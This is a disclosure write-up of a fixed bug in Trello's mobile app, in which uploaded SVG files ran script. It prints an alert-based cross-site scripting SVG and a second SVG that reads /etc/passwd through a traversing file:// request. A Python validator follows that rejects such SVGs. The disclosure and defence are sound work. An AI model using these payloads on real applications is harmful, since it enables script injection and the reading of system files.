Report Status: Fixed

Trello

Trello is a collaboration tool that organizes your projects into boards. In one glance, Trello tells you what’s being worked on, who’s working on what, and where something is in a process. They launched their Bug Bounty Program on February 2nd, 2015. They pay bounties in exchange for a valid bug starting from $256 up to $4096, depending on the severity of the bug.

Vulnerability

Trello allows its users to upload a file through their mobile application. By observing how the upload feature works, I noticed that some file types are executed directly in the Trello app.

Exploitation

I created a .svg file containing a malicious script that will execute once the file is accessed or opened.

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.location);</script>
</svg>
```

After uploading the file above on Trello’s app, I successfully executed a simple Cross-Site Scripting.

[Screenshot: Cross-Site Scripting on Trello]

Then, I noticed that the file was not just uploaded to their third-party storage service but was also stored locally. That is why I quickly remembered that it was possible to perform a Local File Inclusion. So, I created another payload inside the .svg file that will locate, access, and read the /etc/passwd file.

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    function readTextFile(file) {
      var rawFile = new XMLHttpRequest();
      rawFile.open("GET", file, false);
      rawFile.onreadystatechange = function () {
        if (rawFile.readyState === 4) {
          if (rawFile.status === 200 || rawFile.status == 0) {
            var allText = rawFile.responseText;
            alert(allText);
          }
        }
      };
      rawFile.send(null);
    }
    readTextFile("file:///../../../../../../../../../etc/passwd");
  </script>
</svg>
```

After uploading the new file, I successfully displayed the content of the /etc/passwd file.

Reporting

Right after the discovery of the security vulnerability, Trello triaged and fixed it in version 4.0.8.

Verifying the Fix

Shown below is the screenshot of the fix applied by Trello.

If you’d like to try bug bounty hunting or report a possible security vulnerability, you may view their Bug Bounty Program Policy on HackerOne.
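The root cause in this write-up is an uploaded SVG being rendered by the app with script enabled. One server-side mitigation is to refuse script-bearing SVGs at upload time (alongside never rendering stored attachments in a script-capable, file-system-accessible view). The validator below is an added example, not Trello's code: it walks the SVG's XML tree and flags `<script>` and other active elements, `on*` event-handler attributes, and `javascript:`/`file:`/`data:` URLs in `href`, using the two payloads from this post (the second condensed) and a constructed benign SVG as inputs.

```python
import xml.etree.ElementTree as ET

# Elements that can run script or embed foreign content inside an SVG.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
# URL schemes that must not appear in href attributes of a user-supplied SVG.
BLOCKED_SCHEMES = ("javascript:", "file:", "data:")


def find_svg_risks(svg_bytes):
    """Return the reasons an uploaded SVG must not be rendered by the app.
    An empty list means no script-bearing construct was found."""
    try:
        # Production code should parse with defusedxml to resist entity attacks.
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return ["malformed XML: %s" % exc]
    risks = []
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()  # drop the namespace prefix
        if local in ACTIVE_TAGS:
            risks.append("<%s> element" % local)
        for name, value in el.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()  # covers xlink:href as well
            if attr.startswith("on"):
                risks.append("event handler attribute %s" % attr)
            elif attr == "href" and value.strip().lower().startswith(BLOCKED_SCHEMES):
                risks.append("%s URL in href" % value.strip().split(":", 1)[0].lower())
    return risks


def accept_upload(svg_bytes):
    """True only when the SVG carries no active content."""
    return not find_svg_risks(svg_bytes)


# Sample inputs: the write-up's two payloads (second condensed) and a constructed benign SVG.
XSS_SVG = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.location);</script></svg>')
LFI_SVG = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           b'<svg xmlns="http://www.w3.org/2000/svg"><script>var r = new XMLHttpRequest();'
           b'r.open("GET", "file:///../../../../../../../../../etc/passwd", false);'
           b'r.send(null); alert(r.responseText);</script></svg>')
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4" fill="red"/></svg>'

if __name__ == "__main__":
    for label, svg in (("xss", XSS_SVG), ("lfi", LFI_SVG), ("benign", BENIGN_SVG)):
        verdict = "accepted" if accept_upload(svg) else "rejected: " + ", ".join(find_svg_risks(svg))
        print(label, verdict)
```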